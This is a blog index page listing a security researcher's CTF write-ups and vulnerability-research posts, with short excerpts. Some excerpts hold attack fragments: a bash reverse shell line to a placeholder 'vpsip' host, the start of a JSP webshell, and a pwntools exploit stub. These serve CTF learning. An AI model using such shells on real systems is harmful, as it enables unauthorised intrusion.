- 博客(54)
- 收藏
- 关注
RSS订阅原创 如何挖掘UPnP服务漏洞-入门篇
本文首发于xray社区:https://mp.weixin.qq.com/s/VK5CiWa5IIiMMwf–26miA周末测了一下屋里的几个iot设备,顺便学习了一下对于UPnP的服务如何去挖掘漏洞。这里记录一下UPnP的学习笔记。UPnPUPnP是因特网及LAN中使用的以TCP/IP协议为基础的技术。通过无线网络上网的用户都是处于内网,为了保证一些P2P软件正常工作,开启UPnP是必须的,而目前大多数无线路由器等iot设备都具有此功能。只要 NAT 设备(路由器)支持 UPnP,并开启。那么,当
2021-06-30 17:49:35
2119
原创 记一次Postgresql从堆叠注入到RCE
记一次Postgresql从堆叠注入到RCE文章目录记一次Postgresql从堆叠注入到RCE限制udfhackbypasssqlmap的思路rwctf2021-DBaaSadge闲话本次研究过程来自一次某cms的代码审计实战,整个环境部署的相对较好,postgresql、web权限都有单独的用户管理,web目录不可写、服务器不能出网等限制。不过比较幸运的是所有的数据操作都是用同一个superuser权限的postgresql用户来执行的。限制审计发现某处存在postgresql堆叠注入,发现po
2021-02-01 09:45:04
1150
原创 DDCTF2020 Writeup
DDCTF2020 Writeup全靠lfy带飞orz.WebWeb1照着来一遍请求,拿到jwt,jwt.io看一下是hs256跑一下key是1,伪造即可拿到clientclient抓请求发现signature对即可:逆client,得到signature请求逻辑,根据输出格式、输出长度以及输入,判断出签名是hmacsha256算法,然后密钥是DDCTFWithYou,写个签名脚本打一下import requestsimport jsonimport hmacimport bas
2020-09-11 21:22:33
3365
3
原创 redis安全学习笔记
redis安全学习笔记[toc]文章部分内容首发于xray社区公众号基础https://www.runoob.com/redis/redis-tutorial.html环境 : ubuntu 安装redis$sudo apt-get update$sudo apt-get install redis-server$service redis-server start$redis-cliredis连接命令redis-cli -h 127.0.0.1 -p 6379设置键值对:s
2020-05-29 00:55:33
4400
2
原创 Ubuntu1804安装mysql5.7无法更改root密码问题
Ubuntu1804安装mysql5.7无法更改root密码问题昨天重装blog,好久没更新了打算发一些本地的笔记出来,就顺手把服务器镜像换了下。换成了ubuntu1804,然后安装mysql是装的5.7版本,发现无论怎么都改不了密码,或者说无论怎么改密码,登陆都不需要密码。查了一堆资料,发现我这种情况恰好是开启skip-grant-tables的情况,但是又没开,因为开了skip-grant-tables是没法用mysqladmin去改密码的,会有一个报错。后来查到资料是需要删除原本的root用户,再
2020-05-08 19:52:36
296
2
原创 Confidence-2020-Web-Writeup
Confidence-2020-Web-Writeup[toc]Cat web首先是看到可以列几个图片,点一下下拉框是一个无参数?直接带内容的urlhttp://catweb.zajebistyc.tf/?grey然后有一个report功能,这个应该是无回显的ssrf了,一般有另外一个xss的点,思路其实比较清晰,如果是xss的话那么那里可以x呢,回到刚刚的链接看一下html源码,发现有一个接口<html> <head> <title>My ca
2020-05-08 19:39:17
952
原创 APP渗透测试准备(一)
APP渗透测试准备(一)文章目录APP渗透测试准备(一)环境准备安装adb安装fridafrida hook实例环境准备Windows10 X64Python 3.7OppoR9st anroid6.0.1adbfridaburpsuite+brida插件安装adb参考链接:https://wnma3mz.github.io/hexo_blog/2018/01/25/%E7%...
2019-10-05 21:11:13
5166
1
原创 DDCTF2019-WRITEUP
WEB滴~进去之后就看到url一串base64,解两次是flag.jpg,明显文件读取,读一下index.php,发现居然给了博客。这是恶意引流吧,服了。在出题人博客里面找到.practice.txt.swp,然鹅.practice.txt.swp404了,而practice.txt.swp却能访问???佛了。内容是f1ag!ddctf.php,然后在index.php的源码里面发现他将co...
2019-05-04 21:04:09
2866
3
原创 长亭安服面经 && 2019.04
长亭安服面经 && 2019.04暑假本来是不想实习的,安研基本上不收大二,做安服又感觉学不到太多东西,就纯给人做苦力了不值。后来学长强推了一波长亭安服,说虽然是安服,但是实习经验其实也蛮重要的,刚好长亭南京分部也建立了。就投了一发。上周面试完,感觉回答的挺糟糕的。这里记录一下吧。文章目录长亭安服面经 && 2019.04自我介绍CTF中的AWDPHP版本特性P...
2019-04-27 21:50:07
7132
1
原创 0CTF/TCTF2019 Ghost Pepper Writeup
0CTF/TCTF Ghost Pepper Writeup签到成功,告辞。首先发现401一个登陆框,弱口令什么的都试试发现不行。抓包发现返回包里面有karaf的字样。谷歌搜索一波搜到了相关资料:https://karaf.apache.org/manual/latest/webconsole里面说到:The Apache Karaf WebConsole uses the WebCont...
2019-03-25 16:00:19
1408
2
原创 CONFidence CTF 2019-Web 50分析思考
CONFidence CTF 2019-Web 50分析思考当时没做出来,也有看到外国大师傅用缓存投毒非预期的。我还是太菜了orz。首先是一个非常简陋的登陆页面,随手输入一个没人用的用户名,即可注册登陆。两个功能,一个报告bug,一个修改个人信息。经过简单fuzz之后明显可以发现报告bug页面是管理员查看该域名下的某处页面。而修改个人信息页面的shoesize可以selfxss,因为...
2019-03-20 23:06:23
719
原创 FireShell CTF 2019小记
FireShell CTF 2019小记8说了,国际赛的难度大家都晓得滴。看题Python Learning Environment沙盒逃逸orz,最近喜欢玩的一个东东。在前端的python.js里面可以看到一些waf源码。不过还没有我自己fuzz来的快,毕竟前端也不是很熟,源码又太多。fuzz结果:不能用数字,不能用[],还有一堆常见的关键词需要绕过。以及内置函数只剩下exec和pri...
2019-03-20 22:38:37
976
原创 WordPress 5.0.0 Remote Code Execution分析思考
WordPress 5.0.0 Remote Code Execution分析思考本文首发于安全客:https://www.anquanke.com/post/id/173173前言2月20号,RIPS团队在官网公开了一篇WordPress 5.0.0 Remote Code Execution,CVE编号CVE-2019-6977,文章中主要提到在author权限账号下,可以通过修改Pos...
2019-03-20 22:37:36
779
原创 EDU-CTF Final 2018 Web小记
EDU-CTF Final 2018 Web小记文章首发于安全客:https://www.anquanke.com/post/id/170361当时比赛的时候正在复习期末,根本没空玩。昨天考完科二,终于有时间仔细看看了。TwoFile直接给出源码,要命令执行&lt;?phphighlight_file(__FILE__);$file1 = $_GET['f1'];$file2 ...
2019-01-29 15:55:33
632
原创 NJUPTCTF-2018出题心得
NJUPTCTF-2018出题心得NJUPTCTF-2018结束也有几个月了,我也是昨天才忙完各种琐事,包括比赛、考试、出题、总结等等。这段时间经历的事情太多,心也逐渐疲惫,同时感到和同龄人的差距越来越大。现在要补这几个月落下的东西,昨天把CTF学习交流群的入群题出了一下,题目比较简单,希望师傅们别喷。这段时间欠的最久的应该就是校赛的出题心得了吧。虽然我的题全部都有人解出,但是还是有很多人要我写...
2019-01-21 22:50:48
4340
2
原创 python安全之学习笔记(一)
暑假想深入学习下pythonweb的,结果被一堆事缠着,只能勉勉强强看了下ssti模板注入的一些东西。真的是菜的糟心,暑假又是一事无成。0X00.浅谈关于python引发的安全问题pythonweb的话代码方面的问题最多的可能就是SSTI模板注入、沙盒逃逸及反序列化,一般来说,使用django的模板渲染能够抵御很多的xss攻击,sql注入现在确实已经很少了,orm框架的使用,导致sql注入...
2018-09-29 00:03:39
4092
原创 docker环境搭建之wordpress
近来由于某种原因xxx自己用docker搭建一个wordpress环境。把各个坑都踩了遍。这里记录一下。新手上路,大佬勿喷。这里我是win下本地搭好了然后导出数据库放docker里面导入sql文件起服务的。一、docker部署的任意端口后一直跳转80因为wordpress在安装的时候就已经绑定了端口,所以需要改成docker命令run的端口一样的端口。我直接在sql文件里面加两条:...
2018-09-16 23:55:31
721
1
原创 docker环境搭建之phpMyAdmin
近来由于某种原因xxx自己用docker搭建一个phpMyAdmin环境复现一个缓存文件包含的漏洞。把各个坑都踩了遍。这里记录一下。新手上路,大佬勿喷。我这里使用的镜像是ubuntu:16.04首先环境起来之后发现报错:1、没有找到 PHP 扩展 mbstring,而您现在好像在使用多字节字符集。解决方法:Dockerfile里面加一条 RUN apt-get insta...
2018-09-16 12:47:29
1797
原创 巅峰极客线上第二场-writeup
CTFPlainR2B-PWN很明显的栈溢出,第一次溢出打印write函数的地址,然后从和libc中的地址寻找偏移,最后利用system函数和libc中的/bin/sh,getshell后运行服务器上的getflag程序随意输入一些东西,进行多轮后会输出flag贴脚本:from pwn import *r = remote('117.50.60.184', 12345)l...
2018-08-26 20:38:24
4064
原创 Docker学习记录之Flask转docker
今天小伙伴把一个pythonweb的题转docker,过程中出现了一些问题,我也搞了好久,这里记录一下吧。新手上路,大神勿喷。0X00.Dockerfile里面apt-get安装的时候最好加vim等运维需要的命令虽然这不是bug,但是我还是想提一句,如果up的服务没有异常却不知道哪里出了问题,可以exec进去看看,改代码或者安装什么东西,最好把运维需要的命令都在dockerfile里面...
2018-07-26 19:51:18
1325
原创 巅峰极客第一场CTF部分writeup
额,上午驾校学车,中午打了会儿安恒的月赛,就来看巅峰极客的题了。时间关系实力原因没做几个emmmm太菜了waMISC-warmup-100pt拿到一个bmp文件,套路走一波,右键查看属性emmm啥都没有。丢到winhex里面也没有什么明显的提示或者信息。放大招:stegsolve。放在各个颜色通道里面过一遍。可以明显的看到每个颜色通道的最低位有异常数据。将数据提取出来...
2018-07-22 20:49:13
6014
4
原创 某入群题之命令执行字符限制绕过(WEB100)
某入群题又来啦!由于之前刚好做了下hitcon的两个命令执行绕过,问了下pcat能不能写这篇文章。然后他说随便我.....这里就记录一下。看题!类似上次的两题,只是这次字符长度限制变成了20。心中一喜,直接拿上次的exp打了一发。然后发现gg。上次的两题的具体分析可以看我之前的文章。上次的exp在这里不能用的原因是bash、python这些都ban了,不能直接弹shell。但是思路还是能用的。0X...
2018-07-13 16:30:50
2163
原创 Docker学习记录之踩坑笔记
出了几个web水题,甲方要求写dockerfile,萌新我表示没写过,只能现场学一波了。下面是我写dockerfile的心塞史。把遇到的几个小问题列一下。0X01.别为了图快直接FROM别人的镜像!直接from大牛封装的镜像固然是快捷便利,但是相应的自己学习的知识就少了很多,很多安装、运维之类的经验就少了。而且,对应的各服务版本的坑也要重新处理。可能封装的php或者mysql版本和你代码不一样,就...
2018-07-11 17:46:12
7443
原创 HITCON 2015 BabyFirst(命令执行绕正则)
题目地址:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_4/index.php借上次的docker环境,稍微改了下。本地搭了个环境玩。代码审计,整个程序的逻辑是为一个客户端创建一个sandbox/clientip的目录,通过正则表达检查参数值,要求所有的参数仅仅只能为数字和字母。而/bin/orange最终发现只是...
2018-05-16 22:44:35
1681
原创 DEFCON CHINA&BCTF的一些随笔
萌新的第一次线下决赛,毫无意外的被打爆,打扰了我太菜了,告辞!下面记录一下这次的收获吧。靶场渗透这次靶场是打的真的爽,也学习了很多东西。从一个博客开始到服务器到内网最后拿域控权限,打的真的爽啊。这里有5个flag,我们在拿域控,靶场总共6个flag。然后最开始博客的服务器里面我早就发现了一个pwn,应该最后一个flag。唯一的遗憾是没时间了,mimikatz没升级,拿ms14-068打的时候缺少p...
2018-05-14 21:27:57
3704
原创 CTF线下AWD攻防模式的准备工作及起手式
作为大一萌新我并没有打过AWD,可能我做梦都没有想到人生的第一场AWD是DEFCON CHINA吧~(滑稽我自己在服务器上搭了一个cms来模拟AWD场景。0X01 改ssh密码官方在给出服务器密码时,很有可能是默认的,需要赶快修改自己的密码并尝试能不能登陆别人的靶机,搞波事情嘿嘿嘿~0X02 dump源码首先可能没有给源码,需要自己把源码全dump下来。1.使用XFTP或者FileZilla Cl...
2018-05-10 00:05:26
86495
10
原创 HITCON 2015 lalala(SSRF)
题目连接:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_3/index.php一个文件上传题,尝试上传个图片,结果:好吧,环境没搭好,这不能怪我了,我只能看源码来搭了。但是就目前来看似乎可以SSRF.什么是ssrf?是时候系统的学一波了。参考链接:《SSRF漏洞中绕过IP限制的几种方法总结》《SSRF攻击原理与技巧...
2018-05-09 17:47:44
1904
原创 HITCON 2017 babyfirst-revenge-v2(命令执行绕过五)
题目地址:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_2/index.php发现和上一题大体相似,但是发现有一个不一样,长度从5变成了4,没办法利用>>二次写入了。但是我们如果就这样是没法儿按照字典序直接写入ls -t>g到文件的。 因为这一串无论怎么分割写入都无法遵从字典序或是字典序的逆序。然...
2018-05-07 21:30:18
1188
原创 HITCON 2017 babyfirst-revenge(命令执行绕过四)
中午睡了一觉,醒来两点多了,发现几个群里又有人在黑我这个萌新菜比了.....然后用两个多小时ak了iscc放的题,这让我忍不住再次喷一波iscc...老子都ak了排名还5、60名...就因为昨天写红帽杯要交的wp没打....我真tm无语...算了算了不喷了。开始今天的修炼!在远程放好如下内容:bash -c "bash -i >& /dev/tcp/vpsip/vpsport 0&l...
2018-05-03 00:36:48
600
原创 第二届红帽杯线上初赛 RedHat 2018 WriteUp
又是一个划水的比赛,作看高中生吊打全场orz,太强了。WEBsimple upload进入一个登陆页面,抓包之后发现cookie有admin=0改成1之后进入了一个上传页面,获取指纹之后,明显是Apache Tomcat,传一个一句话asp马过去试试。上传yulige.jsp.jpg<% if("023".equals(request.getParameter("pwd"))){ ...
2018-05-02 22:00:45
5667
1
原创 HITCON 2017 babyfirst-revenge(命令执行绕过三)
今天写了下红帽杯要交的wp,颓废了一会儿,喷了一发iscc,然后ak了iscc目前放的题。开始今天的修炼了。其实已经12点,注定今天又做不了多少。估计要被梅子酒笑话了md...再理一下之前有的思路:1.利用'>'+'字符'+'\'+'\'几个字符创建文件(ps:'\'是会把后面的转义掉的,所以如果要让他出现在文件名中,就得用两个\\2.使用ls串接命令可以用ls -t (ps:ls -t...
2018-05-02 00:40:58
865
原创 HITCON 2017 babyfirst-revenge(命令执行绕过二)
昨天不知道怎么了忘记发出去了,和今天的合起来一起发23333333今天国赛,体验了一把被二进制大手子带飞的感觉。贼爽。web1太简单,web2太难,web+pwn我就没做出来过。然后国赛也成为二进制的舞台了(就好像什么比赛不是二进制的天下一样。所以我这只狗又来学web了。接上昨天的,我想本地搭一个,但是想了好久,到底怎么弄,我想看看实现好的环境。搜一波发现有人用docker搭过了。但是我是win1...
2018-04-30 00:19:58
990
原创 HITCON 2017 babyfirst-revenge(命令执行绕过一)
院科协换届...10点才去大活打开电脑...修炼第一天怕是只能看个题了....题目链接:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_1/Chall_1.md审计了一下,大概就是考linux命令执行的绕过,命令长度限制了。直接对着代码想了好久,无果。梅子酒说先搭起环境来,再慢慢搞。WEB学习第一步:搭环境,改bug...
2018-04-28 00:36:23
2793
原创 Jarvis OJ -WEB-WRITE-UP(一)
Jarvis OJ -WEB-WRITE-UP(一) PORT51 题目链接: http://web.jarvisoj.com:32770/ 访问页面之后,页面显示:Please use port 51 to visit this site.当时看到了这个还以为是需要访问这个网站的51端口,但是这个网址已经确定了是访问32770端口,后来一直都没有思路。最后才发现是要求本地以51端口去访问这个网...
2018-04-27 22:17:45
1652
1
原创 DDCTF-WEB&MISC-WRITE-UP
DDCTF-WEB&MISC-WRITE-UPMISC0X01.签到题flag在公告里面,赛前一天我就知道了23333333... 0X02.(╯°□°)╯︵ ┻━┻题目:d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9e1b2e2e5e2b5b4e4b8b7e6e1e1b6b9e4b5e3b8b1...
2018-04-23 22:09:37
2675
原创 关于kali联不上网的一些解决方法
今天打开vmware里的kali时突然发现联不上网了,搞了好一会儿才弄好,这里写个文章总结一下。(net模式可能出现的不能联网的问题)第一种情况首先ifconfig,可以看到没有正在工作的网卡,只有localhost然后ifconfig -a,可以看到eth0这块网卡并没有离家出走,只是罢工了而已接下来是关键步骤leafpad /etc/network/interfaces起初是没有最下面两行的,...
2018-04-09 21:47:44
36973
8
原创 Jarvis OJ -BASIC-WRITE-UP
似乎寒假起就没有好好刷过ctf题了,感觉菜的和狗一样。愈发的感觉到无力。所以来JarvisOJ修炼了,写个WP记录一下。BASIC veryeasyquestion:使用基本命令获取flaganswer:放winhex里面看下,没发现什么东西。题目说是基本命令,试了试binwalk,也什么都没有,再试strings。拿到flag。 关于USS Labquestion:USS的英文全称是什么,请全部...
2018-04-05 17:23:01
3845
2
原创 2018安恒三月月赛-WRITE-IP
打QWB去了,安恒没怎么看2333333333再次感谢榕榕给我的题目QAQ...CRYPTORSA拿到两个文件,一个flag.enc一个pub.key。最简单的rsa,直接秒了。事实是我也拿了一血。(居然把密码学的题放在re里面,猥琐2333333)从pub.key里面提取出n和e,具体可以看我之前写过的笔记《关于rsa的openssl命令一些随笔。》然后再把n放到http://factordb....
2018-04-03 21:33:02
6707
2
原创 第二届“强网杯”全国网络安全挑战赛WRITE-UP
周末打了一下QWB去看神仙打架23333333萌新我勉强苟进了前200,废话不多说了,还是太菜了。努力!WEBweb签到这个题有三层,过三关得flag。第一层param1[]=1&param2[]=2第二层param1[]=1&param2[]=2第三层使用MD5碰撞生日攻击参考链接:http://www.freebuf.com/articles/network/48015.htm...
2018-03-27 21:19:20
2534
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人